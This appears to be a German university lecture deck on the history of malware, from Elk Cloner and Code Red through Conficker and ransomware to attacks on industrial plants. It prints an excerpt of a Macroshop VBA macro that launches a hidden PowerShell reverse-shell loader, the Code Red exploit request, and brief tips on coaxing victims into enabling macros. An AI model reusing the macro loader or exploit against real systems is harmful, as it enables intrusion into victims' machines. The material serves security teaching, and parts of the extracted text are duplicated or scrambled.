SCHERZKEKSE, GAUNER UND SABOTEURE:

DIE SICH WANDELNDE BEDROHUNG IN

EINER DIGITALEN WELTTOBIAS HEER – HOCHSCHULE ALBSTADT-SIGMARINGEN, STUDIENGANG IT SECURITY

Photo credit: Schill on Visualhunt / CC BY

WER BIN ICH?

Tobias Heer

Professor an der Hochschule Albstadt-Sigmaringen

Netzwerke und Netzwerksicherheit

Angewandte Kryptografie

Offensive Sicherheit (Hacking)

Praktikantenamtsleiter IT Security

Senior Architect im CTO Office bei Hirschmann Automation & Control

Gremienarbeit im Bereich Industrie 4.0

Plattform Industrie 4.0 – AG 3 – Sicherheit vernetzter Systeme

ZVEI – Sicherheit Industrie 4.0

VIRUS GEFUNDEN!

3

SCHADSOFTWARE – WIE SCHLIMM IST ES?

4

0

100.000.000

200.000.000

300.000.000

400.000.000

500.000.000

600.000.000

2006 2007 2008 2009 2010 2011 2012 2013 2014 2015 2016

Entwicklung: Anzahl Schadprogramme

Quelle: Die Lage der IT-Sicherheit in Deutschland 2016[3]

Täglich:

ca. 380.000 neue

Schadprogrammvarianten

Häufige Infektionswege:

▪ E-Mail-Anhänge

▪ Drive-by Downloads bei

Besuch von Webseiten

▪ Malvertising

Malware: Häufigste

Angriffsart im Bereich IT

Sicherheit

Laut Cyber-Sicherheits-

umfrage 2015 der Allianz für

Cyber-Sicherheit

5

Scherzkekse und ErkunderVIREN, WÜRMER UND ANDERES GETIER

Photo credit: frank-hl on Visualhunt.com / CC BY-SA

6

CLOWNS: ELK CLONER (1982)

7

Erster Computervirus, der sich auf Personal Computer ausgebreitet hat

Wandert von Festplatte zu Festplatte durch Neuschreiben des Bootsektors

Überwacht die Disketten-Aktivität und kopiert sich auf weitere Disketten

Zeigt Gedicht bei jedem 50. Bootvorgang an

Nur 400 Zeilen Assemblercode

Bleibt im Hauptspeicher, auch wenn eine andere Festplatte eingelegt ist

War als Streich gedacht.

POEMASC 'ELK CLONER:'

DFB $8D,$8D

ASC ' THE PROGRAM WITH A PERSONALITY'

DFB $8D,$8D,$8D

ASC 'IT WILL GET ON ALL YOUR DISKS'

DFB $8D

ASC 'IT WILL INFILTRATE YOUR CHIPS'

DFB $8D

ASC 'YES IT'

DFB $A7

ASC 'S CLONER!'

DFB $8D,$8D

ASC 'IT WILL STICK TO YOU LIKE GLUE'

DFB $8D

ASC 'IT WILL MODIFY RAM TOO'

DFB $8D

ASC 'SEND IN THE CLONER!'

DFB $8D,$8D,$8D,$8D,$0

POEMASC 'ELK CLONER:'

DFB $8D,$8D

ASC ' THE PROGRAM WITH A PERSONALITY'

DFB $8D,$8D,$8D

ASC 'IT WILL GET ON ALL YOUR DISKS'

DFB $8D

ASC 'IT WILL INFILTRATE YOUR CHIPS'

DFB $8D

ASC 'YES IT'

DFB $A7

ASC 'S CLONER!'

DFB $8D,$8D

ASC 'IT WILL STICK TO YOU LIKE GLUE'

DFB $8D

ASC 'IT WILL MODIFY RAM TOO'

DFB $8D

ASC 'SEND IN THE CLONER!'

DFB $8D,$8D,$8D,$8D,$0

Auszug aus Elk Cloner Source Code:

EXPLORERS: MORRIS INTERNET WORM (1988)

8

Computer History Museum Mountain View‘

Quelle: Wikimedia

Robert T. Morris führte 1988 ein "Experiment" durch, um die Größe des Internets zu „messen“

Erster weit verbreiteter Computerwurm in der Geschichte

Infektion von DEC VAX und SUN Computern (4BSD)

Drei verschiedene Infektionspfade

Erraten des Kennworts durch, um auf den Benutzerkonten zuzugreifen

Anmeldung über gespeicherte Benutzerpasswörter an anderen Rechnern (rsh Remote-Anmeldung)

Sicherheitslücke in der sendmail Konfiguration (debug Option)

Pufferüberlauf im Finger-Befehl

Verschiedene Verschleierungskonzepte

Wurm versucht sich zu verstecken, indem er seinen Prozessnamen und seine ID ändert

Wurm ist lange Zeit inaktiv, um eine Entdeckung zu vermeiden

Wurm vermeidet Mehrfachinfektionen, aber jede 7. Instanz wird nicht beendet

DoS durch mehrere Infektionen

VERBREITUNG VON WÜRMERN

9

Fähigkeit, sich ohne menschliches

Eingreifen zu replizieren

Verwendung von Schwachstellen und

falschen Konfigurationen

Manchmal werden mehrere

Sicherheitslücken verwendet

Sehr schnelle Verbreitung mit Phasen

exponentiellen Wachstums, da keine

Interaktion erforderlich ist

t = time

100% 1 2 3

f =

ratio

of in

fecte

d

syste

ms

Typische Wachstumskurve einer

Epidemie

1 Langsames anfängliches

Wachstum

2 exponentielles Wachstum

3 abnehmendes Wachstum

während der Sättigungsphase

AUSWIRKUNGEN DES MORRIS WURMS

10

Auswirkungen des Wurms

Ungefähr 10% des Internets waren infiziert

Schätzungen reichen von 2.000 bis 6.000 infizierten Maschinen

Kein Schaden außer einem unbeabsichtigten DoS-Angriff

Persönliche Konsequenzen für Robert T. Morris

Verweis von der Cornell University

Verurteilt zu 10.000 USD Strafe und 400 Stunden Sozialarbeit

Gewonnene Erkenntnisse

Ernstfall üben! Vorbereitungen treffen!

Bekannte Sicherheitslücken müssen behoben werden

CERT (Computer Emergency Response Team www.cert.org) wurde geschaffen, um

Unternehmen zu unterstützen und Aktionen in Notfallsituationen zu koordinieren

Robert T. Morris

Heute: Professor MIT

(Quelle: Wikimedia)

11

VandalenZERSTÖRUNGSORIENTIERTE CYBERANGRIFFE

Photo on https://visualhunt.com/re/d04967 VisualHunt

VANDALEN: MICHAELANGELO (1992)

12

loc_7: ;check if it is time to nuke

xor cx,cx ; Zero register

mov ah,4

int 1Ah ; Real time clock

; ah=func 04h don't work on an xt

; read date cx=year, dx=mon/day

cmp dx,306h ; See if March 6th

je loc_8 ; Jump if equal to nuking subs

retf ; Return to launch command.com

loc_7: ;check if it is time to nuke

xor cx,cx ; Zero register

mov ah,4

int 1Ah ; Real time clock

; ah=func 04h don't work on an xt

; read date cx=year, dx=mon/day

cmp dx,306h ; See if March 6th

je loc_8 ; Jump if equal to nuking subs

retf ; Return to launch command.com

Bootsektor-Virus der programmiert wurde, um am 6.

März (Geburtstag von Michelangelo) eine „Logic Bomb“

auszulösen

Überschreiben erster HDD-Sektoren mit Nullen

Verbreitung und Infektion

Wurde über infizierte 5,25 "-Disketten verbreitet

Überschreiben des MBR von HDDs

Massenverteilung durch infizierten Treiberdisketten die mit

Computerhardware ausgeliefert wurden (z.B. kostengünstige

Maus)

Ziemlich klein <200 LOC

in Assembler (80x86)

Autor unbekannt,

Variation des Stoned-Virus

VANDALEN: MELISSA (1999)

13

Microsoft Word und Outlook 98/2000 sind 1999 in der gesamten Softwarelandschaft zu finden

Verteilung per E-Mail:

Melissa Code kommt eingebettet in Word-Dokument (VBA Makro)

Anscheinend Liste von Porno Seiten im .doc

Malware sendet Kopien von Melissa an 50 Personen im Kontaktbuch des Opfers

Der Virus vermeidet Mehrfach-Infektionen durch Erstellen eines Registrierungsschlüssels:

HKEY_Current_User \ Software \ Microsoft \Office \ Melissa?

Virus infiziert Normal.dot (Vorlage für Standard-Word-Dokumente)

Neue Word-Dokumente sind standardmäßig infiziert

Geschätzter Schaden in Nordamerika: 80 Millionen USD (wegen E-Mail-Überlastung)

Image : Heise

"Twenty-two points, plus triple-word score, plus fifty points for using all my letters. Game's over. I'm outta here."

MODERNE VBA MACRO MALWARE

14

Meterpreter Reverse Shell

Code eingebettet in VBA,

ausgeführt von Powershell

Die Integration ist schnell

und einfach:

Nutzlast auswählen

Generiere Code durch

Schleiervermeidung

Erstellen Sie

Makroeinbettung mit

Macroshop

Nun fehlt nur noch eine

interessante Office Datei,

um den Code einzubetten

Sub Workbook_Open()

'VBA arch detect suggested by "T"

Dim Command As String

Dim str As String

Dim exec As String

Arch = Environ("PROCESSOR_ARCHITECTURE")

windir = Environ("windir")

If Arch = "AMD64" Then

Command = windir + "\syswow64\windowspowershell\v1.0\powershell.exe"

Else

Command = "powershell.exe"

End If

str = "nVRtc9pGEP7Or9jRXGekMZLFS6iNxjMhOG7cBuIaYqdlmM4hLeji05"

str = str + "18Otlgwn/vCquYfO0XnXa1t8+zu8+KPcIFvHcas0spr7NcG+"

…

str = str + "KmSLmksQx1vnFZ3oSwCbPXhZ67bE2LREan7XpeEw4gVWl05f"

str = str + "iPQ4hNtm5WR1gtnC6tr0pJqtn/VfyJRMxp7zDWJOuzXjcMdz"

str = str + "T9ON3u/gU="

exec = Command + " -NoP -NonI -W Hidden -Exec Bypass -Comm"

exec = exec + "and ""Invoke-Expression $(New-Object IO.StreamRea"

exec = exec + "der ($(New-Object IO.Compression.DeflateStream ("

exec = exec + "$(New-Object IO.MemoryStream (,$([Convert]::From"

exec = exec + "Base64String(\"" " & str & " \"" )))), [IO.Compr"

exec = exec + "ession.CompressionMode]::Decompress)), [Text.Enc"

exec = exec + "oding]::ASCII)).ReadToEnd();"""

Shell exec,vbHide

End Sub

Macroshop Macro Code (Auszug)

DIE GROßE HERAUSFORDERUNG: “KLICK DEN

INHALT AKTIVIEREN” BUTTON!

Excel kommt standardmäßig mit deaktivierten Makros.

Herausforderung für den Angreifer: das Opfer muss auf den "Bearbeiten-Button" klicken

Social Engineering:

Aufbauen von Interesse, Druck, etc., um das Opfer zum Bearbeiten des Formulars zu bewegen

Beispiel: gut gemachtes Formular mit erwarteten Inhalten

Sobald das Opfer die Makros aktiviert hat der Angreifer die Kontrolle

15

VERÄNDERUNGEN DER VERBREITUNG

16

Für die Zeit typische

Kommunikationsmuster

beeinflussen die

Verbreitung von Viren:

Anfänglich war der

physische Transport

durch eine Diskette der

vorherrschende Weg für

die Verteilung

Die Verteilung per E-Mail

ersetzte die Diskette, als

sie allgemein verfügbar

wurde

ICSA Labs Annual Computer Virus Prevalence Survey (2004)

VANDALEN: CODE RED A UND B (13. JULI 2001)

17

Wurm, welcher Pufferüberlauf in

Microsoft IIS-Webservern ausnutzt

Schwachstelle kann aus dem Internet

ausgenutzt werden und erfordert keine

Authentifizierung

Pufferüberlauf im IIS-Indizierungsserver

(idq.dll) (Vulnerability ms01-033)

Sicherheitslücke von Microsoft am 18.

Juni (mehr als drei Wochen vor dem

Angriff von Code Red) geschlossen

Wurm verbreitet sich, indem er eine

Liste von "zufälligen" IP-Adressen

scannt, Kontakt aufnimmt und die

Schwachstelle des IIS-Servers ausnutzt

Source: http://wptidbits.com/resources/12-most-devastating-pc-

viruses-and-worms-of-all-time/

Glück im Unglück: Code Red Version A

enthielt einen Fehler: es verwendete

eine statische Initialisierung des

Zufallszahlen-Generators und

attackierte dieselben Hosts immer und

immer wieder

Nur schwache Verbreitung

Photo on

Visualhunt

CODE RED A INFEKTIONEN

18

Das Wurmverhalten verändert sich

über die Zeit (orientiert an Monat)

Tag 1-19: Wurm verbreitet sich

Tag 20-27: DoS Attack

> Tag 27: Wurm tut nichts

Wurm Verbreitung:

250.000 Systeme in nur 9 Stunden

infiziert

Studie von CERT: Wurm hätte 100%

aller anfälligen IIS-Server im Internet

innerhalb von 18 Stunden infizieren

können

Am 19. Juli: explosionsartiger Anstieg

der Infektionen

Infektionen wurden gestoppt, als der

Wurm in die DDoS-Phase eintrat

Verbreitungs-

phase

DDoS Phase

(weniger Infektionen)

CODE RED AUSWIRKUNGEN

19

Code Red A

DDoS der IP-Adresse der Website des Weißen Hauses und anderer fester IP-Adressen

Der DDoS-Angriff war nicht erfolgreich, weil die Websites auf andere IP-Adressen verschoben wurden

Langsame Ausbreitung aufgrund des Zufallsgeneratoren-Fehlers

Ca. 250.000 infizierte Server Code Red

Version B hat diesen Bug behoben, aber führt keinen DoS Angriff mehr durch

Installation von Hintertür

Ca. 360.000 infizierte Server

Gesamtschaden 2,6 Milliarden USD:

Ca. 1,1 Milliarden USD für die Reinigung

Ca. 1,5 Milliarden USD Verluste aufgrund von Ausfallzeit

GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNN %u9090%u6858%ucbd3

%u7801%u9090%u6858%ucbd3%u7801%u9090

%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3

%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0

GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNN %u9090%u6858%ucbd3

%u7801%u9090%u6858%ucbd3%u7801%u9090

%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3

%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0

Source: https://www.caida.org/research/security/code-red/coderedv2_analysis.xml

Code Red B Verteilung:

Beispiel eines Angriffs (via HTTP):

BUSINESSMEN AND ROBBERS

20

Geschäftsleute und GaunerANGRIFFE MIT FINANZIELLEN ABSICHTEN

Photo

credit:

Infosec

Images

on

Visualhun

t.com/

CC BY

GESCHÄFTSLEUTE?: CONFICKER (2008-2009)

21

1. April 2009

35 Mio. unterschiedliche IP Adressen gesichtet

Etwa 11 Mio. Geräte übernommen/infiziert

Source: http://www.confickerworkinggroup.org/wiki/pmwiki.php/ANY/InfectionDistribution

C&C Server

Victim

CONFICKER WURM / BOTNETZ

22

Verbreitet sich über die eigentlich bereits behobene MS08-067 Schwachstelle (SMB

Netbios Subsystem)

Ziele:

Windows Vista, Windows XP (bis SP3), Windows 2003 (bis SP2), Windows 2000

Mehrere Versionen (A, B, C, D, E)

Conficker “Features”

Verschlüsselte und authentifizierte Kommunikation mit dem C2 Server

Abschaltung von AV Software, Verhinderung von Updates und Patchen der ursprünglichen

Schwachstelle

Rendezvous Mechanismus mit C2 Server: Domain Generation Algorithm

KONTAKT ZUM C&C SERVER

23

Verwendung des DNS Systems

Clients bauen Verbindungen zu zufällig erscheinenden Domänennamen auf

C&C Server befindet sich unter einem dieser Domänennamen

Source: http://www.confickerworkinggroup.org/wiki/pmwiki.php/ANY/InfectionDistribution

.net

TLD DNS Serverpuxqy.

net

CONFICKER DGA

24

Version A generierte jeden Tag 250 Domains bei fünf verschiedenen TLDs

Version B generierte jeden Tag 250 Domains bei acht verschiedenen TLDs

Version C generierte täglich 50.000 Domains bei 116 TLDs

Blockieren von Conficker durch Übernahme aller C&C-Domainnamen wurde fastunmöglich

116 TLDs kooperierten, um alle von der DGA generierten Domains zu blockieren!

Aber ... Conficker C hat einen P2P-Kontrollmechanismus

DNS-Blockierung wurde unwirksam!

Conficker C wurde über P2P auf Conficker E aktualisiert

"ac" , "ae" , "ag" , "am" , "as" , "at" , "be" , "bo" , "bz" , "ca" , "cd" , "ch" , "cl" , "cn" , "co.cr" , "co.id" , "co.il" , "co.ke" , "co.kr" , "co.nz" , "co.ug" , "co.uk" , "co.vi" , "co.za" , "com.ag" , "com.ai" , "com.ar" , "com.bo" , "com.br" , "com.bs" , "com.co" , "com.do" , "com.fj" , "com.gh" , "com.gl" , "com.gt" , "com.hn" , "com.jm" , "com.ki" , "com.lc" , "com.mt" , "com.mx" , "com.ng" , "com.ni" , "com.pa" , "com.pe" , "com.pr" , "com.pt" , "com.py" , "com.sv" , "com.tr" , "com.tt" , "com.tw" , "com.ua" , "com.uy" , "com.ve" , "cx" , "cz" , "dj" , "dk" , "dm" , "ec" , "es" , "fm" , "fr" , "gd" , "gr" , "gs" , "gy" , "hk" , "hn" , "ht" , "hu" , "ie" , "im" , "in" , "ir" , "is" , "kn" , "kz" , "la" , "lc" , "li" , "lu" , "lv" , "ly" , "md" , "me" , "mn" , "ms" , "mu" , "mw" , "my" , "nf" , "nl" , "no" , "pe" , "pk" , "pl" , "ps" , "ro" , "ru" , "sc" , "sg" , "sh" , "sk" , "su" , "tc" , "tj" , "tl" , "tn" , "to" , "tw" , "us" ,

"vc" , "vn"

"ac" , "ae" , "ag" , "am" , "as" , "at" , "be" , "bo" , "bz" , "ca" , "cd" , "ch" , "cl" , "cn" , "co.cr" , "co.id" , "co.il" , "co.ke" , "co.kr" , "co.nz" , "co.ug" , "co.uk" , "co.vi" , "co.za" , "com.ag" , "com.ai" , "com.ar" , "com.bo" , "com.br" , "com.bs" , "com.co" , "com.do" , "com.fj" , "com.gh" , "com.gl" , "com.gt" , "com.hn" , "com.jm" , "com.ki" , "com.lc" , "com.mt" , "com.mx" , "com.ng" , "com.ni" , "com.pa" , "com.pe" , "com.pr" , "com.pt" , "com.py" , "com.sv" , "com.tr" , "com.tt" , "com.tw" , "com.ua" , "com.uy" , "com.ve" , "cx" , "cz" , "dj" , "dk" , "dm" , "ec" , "es" , "fm" , "fr" , "gd" , "gr" , "gs" , "gy" , "hk" , "hn" , "ht" , "hu" , "ie" , "im" , "in" , "ir" , "is" , "kn" , "kz" , "la" , "lc" , "li" , "lu" , "lv" , "ly" , "md" , "me" , "mn" , "ms" , "mu" , "mw" , "my" , "nf" , "nl" , "no" , "pe" , "pk" , "pl" , "ps" , "ro" , "ru" , "sc" , "sg" , "sh" , "sk" , "su" , "tc" , "tj" , "tl" , "tn" , "to" , "tw" , "us" ,

"vc" , "vn"

Variant, Date, Index, Hostname

A, 02/12/2009, 0, puxqy.net

A, 02/12/2009, 1, elvyodjjtao.net

A, 02/12/2009, 2, ltxbshpv.net

A, 02/12/2009, 3, ykjzaluthux.net

A, 02/12/2009, 4, lpiishmjlb.net

A, 02/12/2009, 5, arpsyp.com

A, 02/12/2009, 6, txkjngucnth.org

A, 02/12/2009, 7, vhslzulwn.org

A, 02/12/2009, 8, jcqavkkhg.net

A, 02/12/2009, 9, dmszsyfp.info

(Source : https://blogs.technet.microsoft.com/msrc/2009/02/12/conficker-domain-information/)

Variant, Date, Index, Hostname

A, 02/12/2009, 0, puxqy.net

A, 02/12/2009, 1, elvyodjjtao.net

A, 02/12/2009, 2, ltxbshpv.net

A, 02/12/2009, 3, ykjzaluthux.net

A, 02/12/2009, 4, lpiishmjlb.net

A, 02/12/2009, 5, arpsyp.com

A, 02/12/2009, 6, txkjngucnth.org

A, 02/12/2009, 7, vhslzulwn.org

A, 02/12/2009, 8, jcqavkkhg.net

A, 02/12/2009, 9, dmszsyfp.info

(Source : https://blogs.technet.microsoft.com/msrc/2009/02/12/conficker-domain-information/)

Conficker C&C domains generated by the DGA

Conficker C TLDs:

AUSWIRKUNGEN VON CONFICKER

25

Hoher Schaden durch Bereinigung

Möglicherweise bis zu 9 Milliarden USD Gesamtschaden (laut Cyberseceinstitute)

Bundeswehr-PCs waren im Februar 2009 infiziert

Französische Marine wurde im Januar 2009 infiziert

Es gibt nur Spekulationen über den Zweck des Botnetzes...

Conficker wurde verwendet, um die Software des Waledac-Botnetzes auf von Conficker infizierten Rechnern herunterzuladen und zu installieren, aber es passierte nicht viel mehr

Anwendungen, die Confickers Leistung voll ausnutzen würden, wurden nie gefunden

Theorie 1: Das Conficker-Botnetz wurde zu "heiß", um benutzt zu werden.

Theorie 2: Conficker hat etwas gemacht, aber niemand hat es jemals bemerkt

Conficker existiert noch: Im Jahr 2016 wurde Conficker auf einem PC im AKW Grundremmingen entdeckt. Der PC visualisiert die Lademechanik der Kernbrennstäbe

WIE VERDIENT MAN MIT EINEM BOTNETZ GELD?

26

DDoS as a Service

Ab 20 USD für 30 MinutenDenial of Service Angriffe

Diebstahl von Benutzerdaten

< 10$ für Streaming Account (HBO Streaming)

8$ für iTunes Account

2.5$ für einen Facebook Account

Diebstahl von Bankinformationen

5$ - 45$ für Kreditkartendaten je nach Land und Zusatzinformationen

Bitcoin Mining 9 Tage!

More on cybercrime economy: https://www.mcafee.com/us/resources/reports/rp-hidden-data-economy.pdf

AKTUELLE C2 SERVER ADRESSEN

27

Knapp 900 aktuell aktive C2 Server auf abuse.ch bekannt

…

…

https://ransomwaretracker.abuse.ch/tracker/

GESCHÄFTSLEUTE: ENTWICKLUNG DER RANSOMWARE

28

Bereits 1989 werden die ersten Angriffe mit Ransomware durchgeführt

Der AIDS Trojaner ist in QuickBasic geschrieben

Verbreitungsweg und Verbreitung

Er wurde per 5,25“ Diskette ca. 20.000mal mit der Post verschickt

Die Disketten hatten die Aufschrift „AIDS Information – IntroductoryDiskettes“ und enthielt eine Lizenz-vereinbarung für die Nutzung

Wirkweise

Nach öffnen von INSTALL.EXE installierte sich das Programm in den Start-Dateien (AUTOEXEC.BAT) und wurde inaktiv

Nach 90 Starts wurden die Namen der Dateien auf Laufwerk C: symmetrisch verschlüsselt und die Verzeichnisse vor dem Benutzer versteckt

Anzeige einer Meldung die zur Erneuerung der Lizenzzahlung für die AIDS Datenbank aufrief bevor der Computer wieder verwendbar gemacht würde. Kosten: 189 USD

Auswirkungen;

Eine italienische AIDS Organisation verlor Forschungsergebnisse aus 10 Jahren

Ersteller der Ransomware wurde 1990 verhaftet

Bild

quelle

:

htt

ps:

//uplo

ad.w

ikim

edia

.org

/wik

ipedia

/

com

mons/

e/e

c/A

IDS_

DO

S_T

roja

n.p

ng

AIDS LICENSE AGREEMENT

29

AIDS trojan license agreement:

If you install [this] on a microcomputer...then

under terms of this license you agree to pay PC

Cyborg Corporation in full for the cost of leasing

these programs...In the case of your breach of this

license agreement, PC Cyborg reserves the right to

take legal action necessary to recover any

outstanding debts payable to PC Cyborg Corporation

and to use program mechanisms to ensure termination

of your use...These program mechanisms will

adversely affect other program applications...You

are hereby advised of the most serious consequences

of your failure to abide by the terms of this

license agreement; your conscience may haunt you for

the rest of your life...and your [PC] will stop

functioning normally...You are strictly prohibited

from sharing [this product] with others...

Source:

https://www.virusbulletin.com/uploads/pdf/magazine/199

0/199001.pdf

RANSOMWARE GEGEN SCHULEN UND

ÖFFENTLICHE EINRICHTUNGEN

Bewerbung in fehlerfreiem Deutsch

Excel Datei mit “Informationen” –Kompetenzprofil

Verschlüsselung von Dateien auf der Festplatte

Neustart und Verschlüsselung mit gefälschten Chkdsk Meldung vor Boot

Verschlüsselung von Daten auf lokalen Laufwerken und Netzwerk-Laufwerken

Ziel sind modernere Windows Rechner >= Windows 7

Golden Eye wird in E-Mails als Bewerbung mit konkretem Bezug auf Stellenanzeigen der Zielfirmen verschickt

Anschreiben und Lebenslauf sind so gut gemacht, dass oftmals die Excel Datei geöffnet wird

https://www.heise.de/security/meldung/Aufgepasst-Neuer-Verschluesselungstrojaner-Goldeneye-verbreitet-sich-rasant-3561396.html

30Bildquelle: Heise

RANSOMWARE PETYA

31

Momentan sehr populäre Ransomware:

Verschiedene Verbreitungswege

Watering hole Attacke: MEDoc Steuer-Software in der Ukraine

Wurm: Eternal Blue (MS17-010 - SMB Exploit)

SPAM

Petya überschreibt den Master Boot Record und bringt den Computer zum Absturz

Code im MBR erzeugt gefälschte checkdsk Anzeige und verschlüsselt

Orte der Daten auf dem Datenträger sind verloren

Petja verschlüsselt auch das erste Kilobyte der Dateien

Salsa20 Algorithmus

Petya Ransom Note:

Gefälschte CHKDSK Nachricht

DOPPELT HÄLT BESSER: PETYA AND MISCHA

32

Petya:

Verschlüsselung der

ganzen Festplatte

wenn der Benutzer

ein Administrator ist

Mischa: Ansonsten

Verschlüsselung der

Benutzerdateien

User executes

malware

UAC PromptNothing

happens

Yes

No

Ransom Note

Encrypt Local

Files

Mis

cha

Source: https://www.digitalxraid.com/goldeneye-ransomware/

Overwrite

MBR

CHKDSK

Encrypt MFT

Ransom Note

PetyaRansom Note im Browser:

Ransom Note

beim Boot:

R

WARUM FUNKTIONIERT RANSOMWARE SO GUT?

Hoher subjektiver Leidensdruck beim Opfer

Hohe Wiederherstellungsaufwände bei Firmen

(Wiederherstellung ist arbeitszeitintensiv)

Oftmals fehlende Backups bei Privatpersonen (keine

Alternative zur Zahlung vorhanden)

Gut automatisierbar

Verschlüsselung benötigt keine manuelle Arbeit

durch den Angreifer

Zahlungen über Bitcoin können anonym

abgewickelt werden

Angreifer gehen nach der initialen Infektion ein

geringes Risiko ein

33Photo credit: wuestenigel on Visual hunt / CC BY

RANSOMWARE – ERPRESSUNG MIT SYSTEM

34

AngreiferOpfer

EntwicklerR

$$

R

R

$$$

Verschlüssle

Ransom Note

Starte Malware

R

R

R

VERBREITUNG VON RANSOMWARE HEUTE

35

Angriffsziele:

▪ Desktop Systeme

(Windows, Apple MacOS X)

▪ Server-Systeme GNU/Linux

▪ Mobile Betriebssysteme

Android

BSI-Auswertung

aktive Ransomware-

Familien Q1/Q2 2016:

▪ Locky

▪ TeslaCrypt

▪ Nemucod

▪ Cerber

Quelle: Die Lage der IT-Sicherheit in Deutschland 2017

Firmenumfrage:

▪ 70% der Firmen in den

letzten 6 Monaten betroffen

▪ 22% mit erheblichen

Ausfällen

Kampagnen - (z.B. SPAM, Malvertising)

VERBREITUNGSWEG: MALVERTISING MIT RIG

36

Proxy

Virtual

Dedicated

Server (VDS)

Admin

Server

…

Malvertising/Kompromittierte

Seite bzw. Seite mit

Werbung

Landing

Page

(JS Code)

Browser

Exploits

Statistiken

RIG Team Reseller

RIG Kunde

(Angreifer)

Opfer

Ad

$$$

$$

Payload /

Schadcode

Deliver PL

More

info

: htt

ps:

//w

ww

.tru

stw

ave.c

om

/Reso

urc

es/

Spid

erL

abs-

Blo

g/R

IG-E

xplo

it-K

it-–

-Div

ing-

Deeper-

into

-the-I

nfr

astr

uct

ure

/

Oftmals

infizierter

Server

VERBREITUNGSWEG MALVERTISING/DRIVE-BY-EXPLOITS

37

Angriffsauswertung BSI Q2/2016

Programme:

Angler, Neutrino, Magnitude

Vorgehensweise:

E-Mail Welle mit als Rechnung

getarnten Schadprogrammen

Hauptursache für Drive-by-

Angriffe:

Schädliche Werbebanner

Bereitstellung von Werbebanner

durch Agenturen und Dritte

Keine Überprüfung oder

Qualitätskontrolle vor Einbindung

Möglichkeit der Verwendung:

Webseiten als Ausgangspunkt für

Angriffe mit Drive-by-Exploits

0 50 100 150 200 250 300 350

Microsoft Office

Microsoft Internet Explorer

Microsoft Windows

Oracle,Java/JRE

Mozilla Firefox

Linux Kernel

Google Chrome

Apple OS X

Adobe Flash

Adobe Reader

Behobene kritische Schwachstellen 2016/17

Q2/15 - Q1/16 Q2/16 - Q1/17

Quelle: Die Lage der IT-Sicherheit in Deutschland 2017[7]

EXPLOITS OF DIFFERENT EXPLOIT KITS

38

In Exploit Kits und deren verwendete Browser-Schwachstellen (2014)

Browser mit weniger Schwachstellen machen Exploit Kits weniger effektiv

Abnahme der Angriffe im Jahr 2017

Quelle: http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/11/exploit-kit-usage.png

39

Photo onVisualHunt

SaboteureANGRIFFE AUF INDUSTRIEANLAGEN

IT SICHERHEIT UND INDUSTRIE: EIN NEUES THEMA?

40

Cyberangriffe auf Industrieanlagen gibt es bereits seit Jahrzehnten

Besonders bekannt: Stuxnet

Angriff auf Urananreicherung im Werk Natanz (Iran)

Erste Stuxnet Version: November 2005

Entdeckung von Stuxnet: ca. 2009

Ende des Angriffs: Juni 2012

Angreifer bei Stuxnet: Advanced Persistent Threat -Geheimdienste

Große Herausforderung: Schadcode auf Industriegeräte bekommen Air Gap.

Muss ich als Firma im schönen Schwabenländle Angst vor einem solchen Angreifer haben?

Vermutlich eher nicht Ist nun alles gut?

Quelle: http://blog.nuclearsecrecy.com/tag/centrifuges/

Quelle: Byres Security

Kom

pliz

iert

er

Weg

CYBERSICHERHEIT UND KEKSPRODUKTION –

WAS KANN DA SCHON SCHIEF GEHEN?

41Photo credit: John.E.Robertson on https://visualhunt.com/re/296b7d Visualhunt CC BY

ANGRIFF AUF EINE KANADISCHE KEKSFABRIK –

AUGUST 2015 (INDUSTRIE 3.0)

Annahme der Ingenieure: “Was soll schon passieren? Im schlimmsten Fall sind die Kekse ungenießbar. Da fällt uns eine Tagesproduktion aus.”

Angreifer dringen ins Netzwerk einund beginnen damit dasNetzwerk zu Analysieren

Steuerungen wurden gestört

Keine Kontrolle über die Anlage

Keksteig trocknete in denRohren ein – die Rohre musstenherausgeschnitten werden

42Photo on https://visualhunt.com/re/20b05c Visual Hunt

ANGRIFFE AUF DIE INDUSTRIE

43

Black

Energy 3

Pow

er U

krain

e

(Dez 2

015)

Black

Energy 3

Pow

er U

krain

e

(Dez 2

015)

HA

VEX

RA

T

(Spio

nage

, OPC

)

(Dez 2

014)

HA

VEX

RA

T

(Spio

nage

, OPC

)

(Dez 2

014)

Nig

ht

Dra

gon

(Spio

nag

e, O

il& G

as)

(2009)

Nig

ht

Dra

gon

(Spio

nag

e, O

il& G

as)

(2009)

Stu

xnet

(Iran, S

iem

ens P

LC

s)

(2010)

Stu

xnet

(Iran, S

iem

ens P

LC

s)

(2010)

Opera

tio

n A

uro

ra

(Spio

nag

e &

Man

ip.,

Tech

) (2

009)

Opera

tio

n A

uro

ra

(Spio

nag

e &

Man

ip.,

Tech

) (2

009)

Sham

oo

n (

Sau

di

Ara

bia

n O

li )

(Wip

er)

(2012)

Sham

oo

n (

Sau

di

Ara

bia

n O

li )

(Wip

er)

(2012)

Wan

nac

ry

(Ran

som

war

e)

(Mai

, 2017)

Wan

nac

ry

(Ran

som

war

e)

(Mai

, 2017)

Black

Energy 2

(Spio

nage

)

(Dez 2

010)

Black

Energy 2

(Spio

nage

)

(Dez 2

010)

Wan

nacry

(DB

, Renau

lt, Nissan

)

Wan

nacry

(DB

, Renau

lt, Nissan

)

Angr

iffe

auf In

dust

riean

lage

nA

ngr

iffe

auf In

dust

